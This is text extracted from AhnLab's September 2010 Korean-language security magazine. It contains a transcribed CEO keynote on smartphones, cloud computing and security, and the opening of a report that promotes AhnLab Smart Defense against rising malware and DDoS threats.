S E P T E M B E R 2 0 1 0 - AhnLab, Inc.download.ahnlab.com/kr/site/magazineAhn/ahn_201009.pdf ·...

SPECIAL REPORT

1

되돌아보는 7̂ 7 DDos 대란 2010.09

월간安은 안철수연구소에서 발행하는 보안분석정보 매거진입니다

S E P T E M B E R 2 0 1 0

CEO 강연 지상중계

스마트폰, IT 비즈니스 권력까지 바꾼다

Special Report그것이 궁금하다, AhnLab Smart Defense!

New ProductAhnLab TrusLine, 산업망 노리는 악성코드에 대응하라

Statistics2010년 8월 악성코드 관련 주요 통계

Case Study

기업 웹사이트 변조 악성코드, 분석 및 대응 방안

Hot Issue

크로스 사이트 스크립팅, 공격 위험과 예방법

Product Issue 트러스가스 DPX, 모바일 모니터링 지원

AhnLab's Twitter What’s happening?

2

2010.09

누구나 알다시피 애플의 혁신은 가히 혁명적이다. 아이폰을 필두

로 한 스마트폰 보급은 페이스북, 트위터 등 소셜 네트워크 서비

스의 활성화를 불러왔다. 트위터의 CEO는 '소셜 네트워크가 아

니라 인포메이션 허브이다'라고 트위터에 올린 바 있다. 이에 전

적으로 동의한다. 이제까지는 정보의 양이 많은 것이 미덕이라고

생각했다. 그러나 여기에 반론을 던진 게 트위터이다. 정보가 많

지만 실제로 필요한 것은 140자면 충분하다고. 이것이 커뮤니케

이션 패러다임을 변화시키고 있으며 앞으로 미디어 등에 많은 영

향을 발휘할 것이다. 커뮤니케이션 패러다임의 변화는 세 가지

키워드-스마트폰, 클라우드, 소셜 네트워크-로 읽을 수 있다.

첫째, 단말기. 단말기 관점에서 보면 이것을 기능이 좋아졌다고만

생각할 수도 있다. 그러나 우리가 놓치기 쉬운 것이 '스마트'란 말

을 왜 쓰는가이다. PC는 명령어와 기능을 익혀야 하며 인간이 기

계에 다가가야 한다. 하지만 스마트폰은 이 많은 기능이 인간에

게 다가온다. 굉장히 인간중심적 사고방식을 갖고 있는 것이다.

일례로 스마트폰은 볼 수 있고 흔들림도 알 수 있는 등 냄새 외

에 모든 것을 감지한다. 최근 나온 아이폰 4G는 레티나 디스플레

이를 탑재하여 인간이 눈으로 볼 수 있는 한계를 넘도록 했다. 또

한 스마트폰, 아이패드, 모바일 인터넷 디바이스는 매우 스마트하

기 때문에 비전문가들에게도 급속히 받아들여진다.

둘째, 커뮤니케이션. 휴대폰은 음성 통신부터 시작했는데 이것

이 더 인간적으로 바뀌어 정보, 음성, 각종 자료(raw data) 등 내

가 필요한 지식을 끄집어내는 게 중요하다는 관점으로 바뀌었다.

스마트폰 성장과 함께 소셜 네트워크도 같이 성장하고 있는데 그

이유는 많은 사람들과 커뮤니케이션 할 수 있고 입체적으로 파악

할 수 있는 게 강점으로 떠올랐기 때문이다. 트위터를 보면 타임

라인으로 쭉 흘러간다. 전통적으로는 문서를 만들어 파일을 만들

어 폴더에 저장하고 필요할 때 끄집어내고 이에 대한 보안 시스

템을 만들곤 했다. 이제는 무한정 돌아다니는 정보를 실시간으로

내 지식으로 쓸 수 있고 아이디어를 만들고 비즈니스 모델을 만

들어낼 수 있다는 것이 중요하다.

셋째, 비즈니스 모델의 변화. 이는 우리나라 대기업과 언론이 긴

장하는 부분이다. 그 동안 휴대폰에 소프트웨어와 콘텐츠를 넣는

권한은 통신사, 하드웨어 업체에 있었는데 이것이 개방됐다. 따

라서 그에 대한 의존도가 낮아졌다. 앱스토어가 등장하자 누구나

앱을 올릴 수 있게 글로벌화되고 개방된 것이다. 어찌 보면 비즈

니스 권력의 싸움이다. 더 이상 통신사, 하드웨어 업체와 중소기

업이 하청구조 아닌 윈윈해야 살 수 있는 모델로 간다.

지금 주목해야 할 또 하나는 스마트폰에 있는 정보가 어디에 있

냐는 것이다. 바로 클라우드에 있다. 수많은 정보를 자기 전산실

에 가지고 있을 수 없다. 이는 하드웨어 프로세스를 보면 알 수

있다. 우리가 1990년대 말부터 투자를 많이 해 IT 강국이 됐지만

하드웨어에 투자한 만큼 지금 투자를 하면 그보다 훨씬 빠른 브

로드밴드를 구축할 수 있다. 손정의 회장이 일본의 인터넷이 느

리다고 한탄한 적이 있는데 올해 3월에는 일본이 아시아에서 가

장 모바일과 인터넷이 빠르고 싸다고 말했다. 하드웨어 속도에

의한 것은 얼마든지 바뀔 수 있다. 정보는 기하급수적으로 늘어

스마트폰, IT 비즈니스 권력까지 바꾼다CEO 강연 지상중계

스마트폰IT 비즈니스 권력까지 바꾼다

이 글은 안철수연구소 김홍선 대표님의 '제 15회 정보보호 심포지엄' 기조 연설을 지면으로 옮긴 것입니다.

스마트폰, 클라우드, 소셜 네트워크

커뮤니케이션 패러다임의 세가지 변화

스마트폰은 인간에게 다가오는 기술 이상의 기술

얼마 전 안철수연구소 김홍선 대표는 한국인터넷진흥원이 주최하고 방송통신위원회가 후원하는 '제 15회 정보보호 심포지엄'에 참석해 기조연설을 했다.

심포지엄은 '미래를 향한 도약 무선인터넷과 융합보안'을 주제로 진행됐으며, 김 대표는 '미래를 향한 도약 - 무선 인터넷과 융합 보안'을 발표했다. 최신 IT

트렌드를 관통하는 주요 키워드인 스마트폰, 클라우드, 소셜 네트워크의 의미를 짚어보고, 이 시점의 정보보안 범위와 역할을 설명했다. 이날 행사에는 각

계 정보보호 관계자 및 학생 등 1500여 명이 참가해 성황을 이뤘다. 다음은 이날의 강의를 요약한 것이다.

클라우드, 하드웨어 투자의 한계를 푸는 해법

3

나며, 이에 따라 전기(에너지) 비용도 증가하게 된다. 로컬에서

CPU를 무한정 늘릴 수는 없다. 성능 좋은 환경에서 갖다 쓰면 되

는 것이다. 장비를 구입해 내 PC에서 일일이 비디오 편집 작업하

는 게 아니라 클라우드에서 처리해서 결과만 받으면 되는 것이

다. 이처럼 유틸리티 컴퓨팅 개념으로 바뀌는 것이다. 구글이 클

라우드 시스템을 에너지가 싼 시골에 구축한 이유가 있다. 구글

에는 검색 엔진 분야보다 더 많은 엔지니어가 시스템 네트워크

분야에 있다. 에너지를 줄이는 방향으로 자신만의 서버 및 네트

워크 시스템을 만들어 운영하는 것이다. 결국 비용의 싸움이다.

우리나라는 아직 먼 얘기지만 미국이나 유럽은 이미 3~5년 전에

끝났다. IBM 클라우드 담당자 말로는 20% 정도가 밖으로 나가면

안 되는 정보이고 나머지는 클라우드에 두는 게 관리와 보안 면

에서 좋다는 결론을 내렸다고 한다. 최근 IT 부서는 효율성을 고

민해 CIO가 CFO로 통합되는 추세이다. CFO의 관심사는 딱 두

가지, 비용 절감과 보안이다. 이 요구에 맞는 것이 클라우드이다.

여기에 스마트 기기가 나오면서 클라우드에 더 많은 정보를 가공

해 제공해줄 수 있게 된 것이다.

우리나라 SNS에 없는 게 에코시스템(생태계)이다. 페이스북 안에

많은 정보가 올라오고 미디어가 많은 영향을 받는다. 트위터가

기존 언론보다 빠르다. 스티브 잡스가 현지에서 2시에 발표했는

데 새벽에 보니 수백 개의 트위터가 날아오고 분석된 블로그까지

올라왔다. 소셜 네트워크의 파워를 느낄 수 있다. 지금 봐야 하

는 포인트는 스마트폰, 소셜 네트워크, 클라우드, 디지털 콘텐츠

를 같이 고려해 어떤 가치와 효율성을 만들어내고 얼마나 편리하

고 안전하게 할 것 인가이다. 기존 통신사, 방송사는 정부에서 허

가를 받아 콘텐츠를 변환했기 때문에 사업을 할 수 있었다. 이 모

델이 모두 인터넷에서의 앱이 된 것이다. 그에 따라 기존 사업 모

델이 무너지게 된 것이다. 그 중 광고 모델만 해도 방송사는 뉴스

앞뒤에 광고를 해서 돈을 벌었는데 이제는 사람들이 콘텐츠만 잡

아가기 때문에 광고를 콘텐츠 안에 넣어야 하는 상황이 되었다.

비즈니스 모델도 인프라 가진 업체와 콘텐츠 제공 업체 간 수직

관계가 아니라 수평 관계로 바뀌는 것이다. 그리고 지금은 커뮤

니케이션 캐리어와 디바이스 같은 하드웨어의 게임이 아니라 누

가 디지털 콘텐츠를 빨리 전세계에 공급하느냐의 싸움으로 바뀌

고 있다. 그렇기 때문에 통신과는 무관했던 애플과 구글, MS 등

이 모바일 산업을 이끌고 있는 것이다. 스마트폰이 PC와 휴대폰

에서 진화한 것은 맞다. 여기에 더해진 것이 통신사만 알고 있던

로케이션 정보 등이다. 스티브 잡스도 PDA를 출시했으나 실패했

다. 그 당시에는 사용자가 없어 잘 안 됐는데 지금은 상황이 다르

다. 수많은 애플리케이션이 있고 소셜 네트워크를 많이 쓰는 등

스마트폰으로 활용할 수 있는 것이 훨씬 많아진 것이다. 영화 '아

바타'가 나오기 직전에 3D를 현실화할 수 있는 많은 기술이 있었

듯이 스마트폰이 지금 그런 환경에 놓여 있다.

교통 애플리케이션을 만든 유명한 고등학생이 있다. 그는 그 콘

텐츠를 어떻게 만들었을까? 이미 교통에 대한 많은 정보가 데이

터베이스에 있었고, 그것을 활용해서 스마트폰 애플리케이션을

만들어서 앱스토어에 올린 것뿐이다. 한 명이 충분히 만들 수 있

는 것이다. 그리고 미국의 베스트바이 같은 곳은 자신의 제고가

얼마나 남았는지 인터넷에 공개를 해놓았다. 때문에 고객은 자신

이 찾는 물품이 어디에 얼마나 있는지 빠르게 알 수 있다. 만약

점포 직원에게 물어본다면 훨씬 많은 시간이 들었을 것이다. 그

리고 스마트폰에서 끝나는 것이 아니라 TV와 아이패드와 같은

태블릿 PC에 똑같이 적용되는 것이다. 여기에 소프트웨어 가치는

모두 같다. 그렇기 때문에 이것을 단순한 스마트폰의 문제로 보

면 안 된다. 컨버전스된 여러 하드웨어 플랫폼에 해당되는 것이

다. 그런데 이것을 하드웨어 사업 위주로만 보는 사람들은 이 모

델을 이해하지 못하고 영원히 여기서 헤어나올 수 없다. 구글이

나 애플이 소프트웨어 플랫폼에 집중하는 것은 여러 플랫폼을 겨

냥한다는 것이다. 비록 시작은 스마트폰에서 했지만 수많은 모발

일 기기와 심지어는 가전제품에도 적용된다. 결국 이것은 애플리

케이션 콘텐츠가 유통되는 마켓과 수많은 스마트 단말기, 그리고

정보가 삼각 축으로 구성된 현상이라고 볼 수 있다.

결국, 컨버전스 시대의 변화 코드는 한 마디로 지축이 흔들리는

변화이다. 일부 산업의 문제가 아니고 일부 국가의 문제도 아니

고 미디어, 인프라, 정책, 더 나아가서 문화까지 확산된다. 점점

개인화, 수평화하는 것이다. 또한 글로벌 표준도 바뀌고 있으며

HTML5 파일을 표준으로 정해 그것으로 개발하고 있다. 액티브X

를 많이 쓰는 우리나라도 빨리 HTML5 환경으로 가야 하며 소프

트웨어 플랫폼의 변화를 명확히 인식해야 한다. 컨버전스 시대에

는 하드웨어보다 소프트웨어 콘텐츠가 더 중요하다. 늦었지만 우

리나라 스마트폰도 잘할 수 있다고 생각한다. 그 이유 중 하나는

우리나라가 도시화로 모바일 인구가 많다는 점이다. 실제로 사람

들이 IT를 받아들이는 데에 익숙하다. 그런데 문제는 이런 소프트

소셜 네트워크, 가장 강력한 커뮤니케이션 공간

컨버전스 시대의 변화 코드, 지축이 흔들리는 변화

4

웨어를 제대로 만들어 배포할 수 있는, 소프트웨어 개발/기획/품

질 테스트는 물론 보안성을 높이고 업그레이드하고 패치하는 일

련의 서비스 인프라를 제대로 갖춘 기업이 많지 않다는 것이다.

소프트웨어 업체가 거의 몰락했기 때문에, 이 부분이 우리의 발

목을 잡는 것이다. 스마트폰의 보안 문제는 영원하다고 할 수 있

다. 사실 이런 것을 만들어낼 수 있는 생태계가 중요하다. 그래서

소프트웨어 플랫폼과 인프라의 문제는 소프트웨어 라이프 사이클

관리의 관점에서 봐야 한다. 소비자가 스마트폰을 사용할 때 애

플리케이션을 개발자에게 제공 받고 하드웨어를 선택하고 통신사

를 선택한다. 그럼 사용자가 보안이나 제품의 문제에 닥쳤을 때

누구를 찾아가야 하는가? 이런 서비스 인프라에 대해서도 우리

가 진지하게 고민해봐야 한다. 그렇다면 스마트폰 보안은 무엇인

가? 원론적으로 PC에서 일어나는 보안 이슈가 다 스마트폰에서

발생할 수 있다. 그런데 가만히 생각해보면 PC 보안 사업 초기에

위협이 있을 것은 인지했지만 시장이 커질 것이라고는 아무도 생

각하지 못했다. 그런데 2005년을 기점으로 해킹의 조직화에 따라

보안 시장이 급격히 커졌다.

마찬가지로 스마트폰이 얼마나 보급될지, 어떤 애플리케이션을

사용할지, 또 어떤 소프트웨어 플랫폼이 표준이 될지, 어떤 소셜

네트워크가 기반이 될지 예단하기 어려운 단계에서 모든 상상은

사실 의미가 없다. 스마트폰 보안을 인지하는 것은 맞지만 보안

이 핫이슈인 현재의 현상은 바람직하지 않다.

먼저 소프트웨어 플랫폼을 잘 설계하는 것이 보안의 첫 걸음이

다. 우리나라의 보안 문제가 심각한 이유 중 하나는 소프트웨어

를 다 만들고 나서, 시스템을 다 구축하고 나서 그 후에 보안을

하기 때문이다. 잘못 만들어진 소프트웨어는 사용자와 개발자 모

두를 힘들게 한다. 한편, 우리는 스마트폰과 보안 이야기를 할 때

'위협'과 실제로 발생할 수 있는 '위험(리스크)'을 혼동한다. 언론이

나 어떤 발표를 보면 해킹을 시연해 위험성을 경고한다. 사실 해

킹이나 암호를 깨는 것은 얼마든지 가능하다. 문제는 그 정도의

돈과 노력을 들여서 그렇게 할 이유가 있는가이다. 정보는 중요

도에 따라 공유되어도 되는 것과 외부로 유출되면 안 되는 것, 그

리고 최고 기밀 정보 등으로 나눌 수 있다. 이런 차이를 고려하

지 않고 무조건 일괄적으로 보안을 하면 더욱 심각한 문제를 일

으킬 수 있다. 해킹이 가능하다는 사실 자체보다는 기업 및 고객

의 정보가 유출되거나 DDoS 공격을 받을 수 있다는 리스크 측면

에서 접근해야 한다. 그런 맥락에서 스마트폰 보안 이슈도 차분

하게 볼 필요가 있다. 가령 스마트폰 악성코드는 스마트폰뿐 아

니라 SD 카드나 PC 감염 등의 종합적 관점으로 봐야 한다.

스마트폰 다음으로 주목 받는 키워드가 클라우드이다. 클라우드

와 보안의 관계는 세 관점으로 볼 수 있다. 첫째가 클라우드 컴퓨

팅 기술을 접목한 보안 솔루션이다. 한 달에 100만 개 이상씩 발

견되는 악성코드를 모두 사용자 PC에서 처리하면 부하가 크기

때문에 서버에서 제어하는 것이 훨씬 효율적이다. 또한 그 속에

많은 알고리즘을 적용해 더 정교하고 정밀한 대응을 할 수 있다.

이를 위해 클라우드 시스템을 구축해 각 PC와 스마트폰, DDoS

차단 장비 등 다양한 기기에 활용할 수 있다.

둘째는 클라우드 컴퓨팅 자체의 안전을 뒷받침하기 위한 보안으

로서 자동화한 위험 탐지 및 대응 체제와 보안 관제 서비스가 해

당한다.

셋째가 클라우드 컴퓨팅을 구축할 때 필요한 보안 기술이다. 기

존 컨셉, 기존 제품으로만 보지 않고 다시 분해하고 재조합해 각

트랜잭션이나 단계 별로 어떻게 처리할지 세밀하게 볼 필요가 있

다. 아울러 전방위 대응 능력, 보안 표준 업데이트, 관련 기관과

긴밀한 협력이 필요하다.

IT 인프라의 변화를 한 마디로 표현하면 컨버전스라고 할 수 있

다. IP 프로토콜을 기반으로 음성, 오디오, 비디오 및 데이터 등

의 멀티미디어를 복합적, 통합적으로 제공하는 시대가 되었다. 이

러한 컨버전스 시대에는 보안도 입체적으로 접근해야 한다. 사용

자 스스로 쓸 것을 찾고 그 다음 스마트폰을 정하고 통신사를 정

하는 시스템이기 때문에 애플리케이션과 콘텐츠 관점에서 볼 필

요가 있다. 그리고 글로벌 트렌드를 이끄는 애플과 구글의 트렌

드를 놓쳐서는 안 된다. 이들이 만든 수퍼 플랫폼 아래에 수많은

애플리케이션 플랫폼이 만들어질 수 있다. 이렇게 콘텐츠와 단말

기가 교류하도록 안전한 플랫폼을 만드는 것이 보안의 역할이다.

즉, 소프트웨어 생태계 전체를 폭넓게 보는 것이 중요하다. 또한

UX(user experience), 속도 등의 사용편의성과 실질적 보안 성능

을 보아야 한다. 아울러 획일적이지 않은 보안 정책이 필요하다.

많은 기관이나 기업에서 스마트폰을 도입할까 말까 망설이는데

스마트폰 보안, 무엇을 상상하든 지금은 무의미

[그림 1] 클라우드 컴퓨팅의 세 가지 관점

클라우드 컴퓨팅의 세 가지 관점

컨버전스 시대에는 보안도 입체적으로 접근해야

5

이는 5년 전부터 미국의 CIO들이 고민하던 것이다. 사실 조직 구

성원들이 업무에 활용하기 위해 웹 메일이나 스마트폰 쓰는 것을

막을 수는 없다. 중요 기밀을 다루는 구성원과 일반 구성원을 세

분해 전자에게는 오바마 대통령이 특별 제작된 블랙베리를 쓰듯

이 별도 조처를 하는 등 유연함이 필요하다. 그리고 단순히 하드

웨어를 사고 소프트웨어를 사는 것이 아니라 입체적으로 자신의

업무를 중심으로 설계하는 관점이 필요하다.

현재의 플랫폼은 클라우드, 웹, 소셜 네트워크, 애플리케이션으로

구성된다. 이런 플랫폼이 각종 디바이스와 맞물려 돌아간다. 예를

들어 교육 측면을 보면 이미 많은 교육 자료가 디지털로 저장됐

고 BBC나 디스커버리 채널의 많은 자료도 멀티미디어로 제작되

어 있다. 디바이스만 나오면 학생들이 학교에서는 아이패드나 태

블릿 PC로, 밖에서는 스마트폰으로 보고 집에서는 PC로 공부하

고, 가족과 함께 TV로 보게 된다. 나는 아마존 킨들을 갖고 있는

데 킨들에 있는 것을 아이폰, 아이패드, PC에서도 본다. 이것이

바로 소프트웨어 플랫폼이 중요한 이유이다. 어느 디바이스에 어

떻게 적용되느냐는 그 다음에 고민할 사안이다. 그런데 이 과정

에서 놓치지 말아야 할 것이, 얼마나 측정할 수 있고 추정 가능하

고 투명하고 안전한 플랫폼을 만드느냐이다. 가령 모바일 오피스

를 만든다면 허용할 수 있는, 허용해야 하는 디바이스를 정하고

로드맵을 만들어야 한다. 이메일, 소셜 네트워크 등을 오픈할 것

과 하지 않을 것을 구분하고, 어떻게 얼마나 안전하고 추적 가능

하게 할 것인가를 시스템화해야 한다. 이때, IT 부서가 정책을 만

들어 공지하고 보안 소프트웨어를 설치해서 교육하는 수직적인

방식이 아니라 전체 업무를 수평적인 플랫폼으로 보는 것이 필요

하다.

보안 기술이 다른 소프트웨어나 IT 기술과 구분되는 가장 중요한

요소는 지능성이라고 생각한다. 예를 들어 라우터는 테이블에 저

장된 것을 다른 곳에 보내기만 하면 역할이 끝난다. 그러나 방화

벽이나 IPS, DDoS 방어 장비 등의 보안 제품은 수많은 패킷을 다

분석해야 한다. 다른 소프트웨어는 로직을 따라가면 되는데, 보안

은 각 콘텐츠의 가치를 따져야 한다. 따라서 IT에서 일어날 수 있

는 모든 문제를 가장 잘 해결할 수 있는 것은 보안 소프트웨어이

다. 더욱이 보안 기술은 얼마든지 외연을 확장해 다양한 서비스

나 하드웨어와 접합될 수 있다. 보안 제품이 따로 있는 것이 아

니라 보안에 관한 많은 아이디어와 컨셉이 다양한 서비스와 애플

리케이션, 콘텐츠와 디바이스에 스며들어가는 것이다. 그것이 진

정한 보안이고 사용자를 편하게 하는 시스템이라고 생각한다. 지

금 일어나는 변화는 정말 예상을 초월하는 굉장히 큰 변화이다.

엔지니어만이 아니라 사회 전체가 바뀌는 것이다. 그래서 보안은

외부의 위협을 막는다는 관점에서 좀더 적극적으로 나가야 한다.

플랫폼에 스며들어서 투명하고 측정 가능하고 신뢰할 수 있는 플

랫폼을 만드는 데 기여하는 것이 모바일 인터넷과 컨버전스(융합)

의 시대에 우리가 고려할 요점이다.

소프트웨어 플랫폼 먼저, 그 다음에 디바이스

[그림 2] 서비스 플랫폼과 디바이스 플랫폼의 상호작용

Accountability Security Intelligence

Social Network Web Service Cloud

UtilitiesDevice Platform

Service Platform

Security Backup

최적화 동기화가상화

보안은 다양한 서비스, 앱, 콘텐츠,디바이스에 스며드는 것

6

초기 악성코드는 제작자의 호기심 또는 자기 과시에서 제작되었

다. 이러한 제작자의 성격이 변하기 시작했다. 더 이상 제작의 목

적이 악성코드를 만들어 유행시키는 것이 아니다. 악성코드를 컨

트롤하여 DDoS 공격, 개인정보 유출, 스팸메일 발송 등의 수단으

로 이용하기 위함이다. 이는 악성코드가 '금전적 이득'을 목적으

로 제작되고 있기 때문이다. 즉, 악성코드 제작자에게 악성코드는

'목적'에서 '수단'으로 변화한 것이다. 2005년 이후 이러한 추세는

더욱 두드러지게 나타나고 있다. 이러한 금전적 이득을 목적으로

악성코드를 생산함에 따라 악성코드가 급증하게 된다. 또한 악성

코드를 대량생산하고 자동적으로 변종을 만들 수 있는 툴들이 악

성코드 제작자들 사이에 만들어지고, 거래되면서 사이버 블랙 마

켓이 형성되었다. 이렇게 악성코드 제작 툴이 저렴하게 거래되자,

악성코드의 숫자가 이전에는 상상할 수 없었을 정도로 폭발적

인 증가세를 보이고 있다. 안티바이러스 제품을 테스트 하고 있

는 AV-test.org에 따르면 신종 악성코드의 수는 2005년 333,000

개, 2006년 972,000개, 2007년 5,490,000개로 증가하고 있다. 또

한 ASEC 2008 Annual Report에 의하면 2008년 한해 동안에만도

전세계적으로 800만개 이상의 악성코드가 만들어졌다고 한다. 이

러한 전문기관의 분석 자료를 통해 알 수 있듯이 악성코드의 숫

자는 이전에는 상상할 수 없는 수준으로 매년 기하급수적으로 증

가하고 있다.

SPECIAL REPORT 2010.09그것이 궁금하다, AhnLab Smart Defense!

왜 AhnLab Smart Defense 인가

01

[그림 1] 악성코드 증가 추세 (출처: AV-Test.org)

사이버 공격은 '속도의 전쟁'이다. 하루에도 수천, 수만 개의 악성코드가 생성되고 있다. 공격자들이 만들어내는 신종 악성코드 수와 보안 업체들이 처리하

는 시그니처 수의 격차는 좀처럼 좁혀 들지 않고 있다. 오히려 그 간격이 점차 커지고 있다는 오늘날의 현실이다. 이와 같은 사이버 공격을 사람의 힘으

로 대응하는 것은 불가능하며 자동화된 방식으로 신속하게 대처하더라도 불충분하다. 이러한 강력한 사이버 공격에 대처하기 위해서는 사전에 적극적으

로 방어하는 기술이 필요하다. 이 글에서는 최근 사이버 공격의 특징과 기존 대응 방법을 문제점을 살펴본다. 그리고 이를 해결해 줄 클라우드 컴퓨팅 개

념의 악성코드 대응 기술인 AhnLab Smart Defense(이하, ASD)에 대해 소개하고자 한다.

최근 보안 위협 동향

7

[그림 2] 연도별 악성코드의 주요 특징 및 변천사

악성코드 제작이 금전적 이득으로 연결되자, 악성코드 제작도 사

이버 블랙 마켓의 시장 경제 원리로 움직이기 시작한다. 주민등

록번호, 은행계좌번호, 신용카드 정보 등 개인 정보에 대한 거래

가 활발해지면 개인 정보를 빼내가는 악성코드의 제작/배포가 급

증하게 된다. 또한 특정 기업에 DDoS 공격을 감행하고 이를 미

끼로 돈을 요구하는 수법이 늘어나자 DDoS 공격에 이용되는 봇

(Bot)의 제작이 늘어나게 된다.

특히, 악성코드가 네트워크 공격에 이용되면서 DDoS 공격에서

도 변화를 겪게 된다. [그림 3]과 같이 초기 DDoS 공격은 고난도

의 해킹 기술은 이용한 시스템 자원을 고갈시키는 양상을 보였다.

TCP Syn Flooding, UDP/ICMP Flooding 공격이 주를 이뤘으며, 공

격 발생시에는 1~3Gbps 수준의 공격이 감행되었다. 2007년도부

터는 C&C(Command & Control) 서버 기반의 봇(Bot) 제어를 통한

DDoS 공격이 주를 이루었다. 특히 이 시점부터는 사이버 블랙 마

켓에서 GUI 기반의 악성코드, 해킹, DDoS 공격 툴이 저렴하게 거

래되면서 이러한 사이버 공격이 더욱 증가했다. 이는 전문 해커

가 아닌 비전문가도 손쉽게 악성코드를 제작하여 사이버 공격을

감행할 수 있게 되었기 때문이다. 가장 주목해야 할 것은 2009년

발생한 7.7 DDoS 대란이다. 7.7 DDoS 대란은 예전의 공격 형태와

는 다른 양상을 보였다. 공격자가 중앙에서 공격을 제어하는 방

식이 아닌 공격에 이용되는 PC가 직접 특정 시점에 공격 목표를

업데이트 받고 동시 다발적으로 다양한 목적지를 향하는 공격이

특징이었다. 7.7 DDoS 대란 이후 DDoS 공격의 가장 큰 특징은

네트워크와 PC의 복합 공격이 대세를 이루고 있다는 것이다. 즉,

해킹, 악성코드, 봇, 네트워크 공격 등이 결합되어 하나의 보안

솔루션만으로는 이를 방어하기 힘든 상황이 펼쳐지고 있다. 이러

한 DDoS 공격을 방어하기 위해서는 공격 대상의 보호도 중요한

방법이지만, 공격을 실행하는 코드의 분석을 통한 좀비 PC 의 원

천적인 치료가 필요하다. 또한 치료가 어려울 경우 공격이 발생

이 되지 못하도록 하는 조치와 공격 트래픽의 사전 방어 등이 필

요한 상황이다.

앞서 살펴본 것처럼 보안을 위협하는 악성코드가 급증하고 복합

적인 공격 양상을 띠면서 포인트 보안 솔루션만으로는 방어하는

데 한계가 존재한다. 대표적인 포인트 보안 솔루션인 안티바이러

스 제품과 네트워크 보안 제품이 안고 있는 문제점을 살펴보자.

악성코드의 특성 변화

악성코드와 네트워크 공격과의 결합

현재 보안 솔루션의 문제점

8

악성코드의 폭발적 증가는 모든 안티바이러스 업체에 기존에 경

험해 보지 못한 새로운 이슈로 다가왔다. 악성코드의 숫자가 이

전에는 상상할 수 없이 많아짐에 따라 결과적으로 기존에 크게

이슈가 되지 않았던 안티바이러스 소프트웨어의 두 가지 문제점

이 부각되고 있다.

매시간 수백 ~ 수천 개의 신종 악성코드를 처리함에도 불구하

고, 점점 더 많은 변종 악성코드가 만들어 짐에 따라 기존에 악

성코드를 수집하고, 분석하고, 엔진에 포함시키는 일련의 작업

들만으로는 모든 악성코드를 처리할 수 없게 되었다. AV-test.

org에 따르면 45개의 안티바이러스 제품을 분석해본 결과 신종

악성코드의 수는 2005년 333,000개, 2006년 972,000개, 2007

년 5,490,000개로 기하급수적으로 증가하였다. 이에 비해 안티

바이러스 제품의 시그니처 수 증가는 2005년 111,566개, 2006년

134,484개, 2007년 148,869개로 신종 악성코드 수에 턱없이 못 미

치고 있다. 많은 안티바이러스 솔루션 개발사들이 이러한 악성

코드에 대항하여 진단율을 높이기 위해 시그니처 기반의 블랙

리스트(Blacklist)* 방식 이외에도 Heuristic Detection*, Proactive

Prevention*, Sandbox* 등의 다양한 기법을 사용하고 있다. 이

러한 방식은 안티바이러스 솔루션이 설치되는 PC 환경의 다양

성, PC 사양의 제한, 업데이트 관리, 그리고 오진 등의 이슈로 인

해 범용적으로 사용하기에는 한계가 있는 게 사실이다. 또한 진

단 개수 증가는 엔진 사이즈 증가와 더불어 검사 속도 증가 및

더 많은 메모리 사용을 필요로 하며, 그만큼 오진의 가능성을 높

이고 있다.

[그림 3] 최근 DDoS 공격 진화 형태

안티바이러스의 한계점

진단율 이슈

신종 악성코드 수

안티바이러스 제품의시그니처 수

2005

333,000

111,566

972,000

134,484

2006

5,490,000

148,869

2007

[그림 4] 연도별 신종 악성코드 수 (출처: AV-test.org)

9

이렇게 악성코드의 숫자가 많아질수록 빠른 업데이트가 상당히

중요해진다. 과거와 달리 이제는 단 한 시간 업데이트가 지연되

어도 수 천 개 이상의 신종 악성코드에 감염될 위험에 노출된다.

이에 따라 악성코드의 숫자의 폭발적 증가에 대응하기 위해 안

티바이러스 솔루션 개발 업체의 경우 업데이트 주기를 단축하는

방법을 우선적으로 사용하고 있다. 현재 대부분의 업체에서 이전

에 일주일에 한번 업데이트를 제공하던 방식에서 하루에 한번 이

상의 시그니처 업데이트를 제공하고 있는 중이다. 그러나 이러한

업데이트 주기 변경만으로는 현재의 이슈를 해결하는 것은 불가

능하다. 현재 악성코드 대응 방식은 다음과 같은 문제점을 안고

있다.

최신 업데이트 미적용

사용자가 PC에 자동업데이트 설정해 놓지 않아 최신 업데이트를

적용하지 않았다면 위험에 그대로 노출

엔진 대응

악성코드 출현 시 샘플 수집에서 엔진 제작까지 여러 단계를 거

쳐야 하므로 이 시간 동안 위협에 무방비 노출

엔진 배포

업데이트 주기를 단축하는 방법을 사용하고 있으나 업데이트 시

간차에 따른 위험 여전히 존재

[그림 5]와 같이 새로운 위협에 대한 실시간 대응이 피해 최소화

에 가장 중요한 역할을 하게 되는 현시점에서 기존의 안티바이러

스 엔진 업데이트 방식은 개선되어야 할 당면 과제이다. 이 밖에

도 대응 시그니처 수의 증가는 엔진 사이즈의 증가를 동반하고

있다. 과거 18개월간 대부분의 안티바이러스 솔루션들의 엔진 사

이즈가 두 배로 증가되었으며, 심한 경우 3배까지도 증가했다고

한다. 또한 엔진 사이즈가 커지고, 업데이트 빈도가 늘어남에 따

라 업데이트 사이즈도 기하급수적으로 증가하고 있다.

네트워크 보안 제품은 기본적으로 내부 네트워크로의 불법적인

접근제어 및 네트워크 기반 공격을 탐지, 방어하는 기능을 수행

함으로써, 네트워크의 무결성을 유지하는 역할을 한다. 하지만 이

미 악성코드에 감염된 PC의 내부 네트워크 악성코드 확산 행위

를 효과적으로 제어할 수 있는 방법이 없다. 감염된 PC의 악성

트래픽 유포 행위를 정확하게 탐지할 수 있는 방법이 없거나 있

어도 오탐이 많아 서비스 가용성을 심각하게 침해할 수 있다. 또

한 악성코드에 감염된 PC에 대한 효율적인 자동치료 기능이 없

어, 별도의 안티바이러스 제품으로 해결할 수 밖에 없다. DDoS

공격을 예를 들어 보자.

[그림 6]과 같이 최근 DDoS 공격은 시스템 레벨과 네트워크 레

벨에서 동시에 발생한다. 하지만 네트워크 보안 제품은 네트워크

레벨에서 공격 트래픽을 제어하는 역할을 할 뿐이다. 공격 발생

근원지인 시스템 레벨을 제어하지 않으면 공격은 계속 발생하기

마련이다. 따라서 공격 발생 근원지인 좀비 PC에 대한 치료와 네

트워크 레벨에 대한 방어가 입체적으로 진행되어야 한다.

업데이트 속도 이슈

2005년 2006년 2007년

45개 백신업체 업데이트 사이즈 520 GB 1.0 TB 1.6 TB

[표1] 백신업체 누적 시그니처 업데이트 사이즈 (출처: AV-test.org)

네트워크 보안 제품의 한계점

[그림 6] 기존 DDoS 대응 방식의 한계

[그림 5] 실시간 대응과 피해 규모의 상관 관계

시간시간

확산도 확산도

피해 ($$$)

새로운 위험에 대한실시간 대응

피해 ($$$)

